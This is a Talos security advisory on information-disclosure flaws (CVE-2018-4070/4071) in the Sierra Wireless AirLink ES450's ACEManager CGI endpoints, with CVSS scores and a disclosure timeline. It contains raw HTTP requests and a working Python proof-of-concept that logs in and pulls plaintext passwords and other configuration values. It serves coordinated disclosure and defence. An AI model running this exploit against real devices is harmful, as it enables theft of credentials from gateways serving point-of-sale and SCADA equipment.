Lucene search

K
talosTalos IntelligenceTALOS-2018-0755
HistoryApr 25, 2019 - 12:00 a.m.

Sierra Wireless AirLink ES450 ACEManager Embedded_Ace_Get_Task.cgi Information Disclosure Vulnerability

2019-04-2500:00:00
Talos Intelligence
www.talosintelligence.com
42

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

4 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

0.099 Low

EPSS

Percentile

94.8%

Summary

An exploitable Information Disclosure vulnerability exists in the ACEManager Embedded_Ace_Get_Task.cgi functionality of Sierra Wireless AirLink ES450 FW 4.9.3. A specially crafted HTTP request can cause an information disclosure, resulting in the exposure of confidential information, including, but not limited to, plaintext passwords and SNMP community strings. An attacker can make an authenticated HTTP request, or run the binary, to trigger this vulnerability.

Tested Versions

Sierra Wireless AirLink ES450 FW 4.9.3

Product URLs

<https://www.sierrawireless.com/products-and-solutions/routers-gateways/es450/&gt;

CVSSv3 Score

7.7 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

CWE

CWE-200: Information Exposure

Details

Sierra Wireless is a wireless communications equipement designer and manufacturer. They provide both embedded solutions as well as wireless hardware solutions, including both the ES450 and GX450 devices. The AirLink ES450 is a LTE gateway designed for distributed enterprise. The ES450 is typically seen connecting Point-of-sale devices, remote SCADA equipment, or other business critical equipment. The AirLink ES450 also provides a terminal server for remote out-of-band administration.

ACEManager is the web server included with the AirLink ES450. This web server is responsible for the majority of interactions in the device. Some specific capabilities of the web server are routing, device reconfiguration, user authentication and certificate management. The vendor has stated that the ACEManager web application is not accessible by default from the Cellular WAN.

These vulnerabilities were discovered and tested using the AirLink ES450. Most likely this vulnerabilities also affects the AirLink GX450 product as well.

CVE-2018-4070

The Embedded_Ace_Get_Task.cgi executable is used to retrieve MSCII configuration values within the configuration manager of the AirLink ES450. This binary does not have any restricted configuration settings, so once the MSCIID is discovered, any authenticated user can send configuration changes using the /cgi-bin/Embedded_Ace_Get_Task.cgi endpoint. The following request shows the MSCIID for retrieving the user password for the device in plaintext.

 POST /cgi-bin/Embedded_Ace_Get_Task.cgi HTTP/1.1
 Host: 192.168.13.31:9191
 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://192.168.13.31:9191/admin/ACEmanagerX.html
 Content-Type: text/xml
 Cache-Control: no-cache, must-revalidate
 Pragma: no-cache
 Content-Length: 4
 Cookie: token=fd57b4e137a8f9fe1a3c998fc25b0e1e
 Connection: close

 5003

This binary has -rwxr-xr-x permissions which allows the binary to be executed outside of the web user interface as well, such as if a user logs in over SSH. This allows a low-privilege user to retrieve the password of other users on the system, status of services, and retrieve any other configuration on the device.

CVE-2018-4071

The Embedded_Ace_TLGet_Task.cgi executable is used to retrieve MSCII configuration values within the configuration manager of the AirLink ES450. This binary does not have any restricted configuration settings, so once the MSCIID is discovered, any authenticated user can send configuration changes using the /cgi-bin/Embedded_Ace_TLGet_Task.cgi endpoint. The following request shows the MSCIID for retrieving the user password for the device in plaintext.

 POST /cgi-bin/Embedded_Ace_TLGet_Task.cgi HTTP/1.1
 Host: 192.168.13.31:9191
 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: http://192.168.13.31:9191/admin/ACEmanagerX.html
 Content-Type: text/xml
 Cache-Control: no-cache, must-revalidate
 Pragma: no-cache
 Content-Length: 18
 Cookie: token=fd57b4e137a8f9fe1a3c998fc25b0e1e
 Connection: close

 rows=1&colsid=5003

This binary has -rwxr-xr-x permissions which allows the binary to be executed outside of the web user interface as well, such as if a user logs in over SSH. This allows a low-privilege user to retrieve the password of other users on the system, status of services, and retrieve any other configuration on the device.

Exploit Proof of Concept

 #!/usr/bin/env python
 #Author : Carl Hurd, Cisco Talos
 import sys
 import requests

 def auth(ip, port, password):
      data = """&lt;request xmlns="urn:acemanager"&gt;
      &lt;connect&gt;
      &lt;login&gt;user&lt;/login&gt;
      &lt;password&gt;&lt;![CDATA[{}]]&gt;&lt;/password&gt;
      &lt;/connect&gt;
      &lt;/request&gt;""".format(password)

      response = requests.post("http://"+ip+":"+port+"/xml/Connect.xml", data=data)

      try:
           cookies = dict(token=response.headers["Set-Cookie"].split("; ")[0][len("token="):])
           return cookies
      except:
           print("Error while authenticating")
           sys.exit(0)

 def main():
      if len(sys.argv) &lt; 5 or len(sys.argv) &gt; 5:
           print("Usage : {} [ip address] [port] [password of user] [msciid to get]".format(sys.argv[0]))
           sys.exit(0)
      
      ip = sys.argv[1]
      port = sys.argv[2]
      password = sys.argv[3]
      msciid = sys.argv[4]

      print("MSCIID : {}\n".format(msciid))

      cookies = auth(ip, port, password)

      data = msciid
      response = requests.post("http://"+ip+":"+port+"/cgi-bin/Embedded_Ace_Get_Task.cgi", cookies=cookies, data=data)

      print(response.text)

 if __name__ == "__main__":
      main()

Timeline

2018-12-14 - Vendor disclosure
2018-12-17 - Vendor acknowledged
2019-01-08 - Discussion to review vendor’s analysis of issues<br 2019-02-26 - Vendor provided analysis of CVSS scoring
2019-03-26 - Vendor established timelines for fix/public disclosure
2019-04-20 - Talos provided revised CVSS score on TALOS-2018-0746, TALOS-2018-0751, TALOS-2018-0752, TALOS-2018-0755, and TALOS-2018-0756
2019-04-25 - Public Release

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

4 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

0.099 Low

EPSS

Percentile

94.8%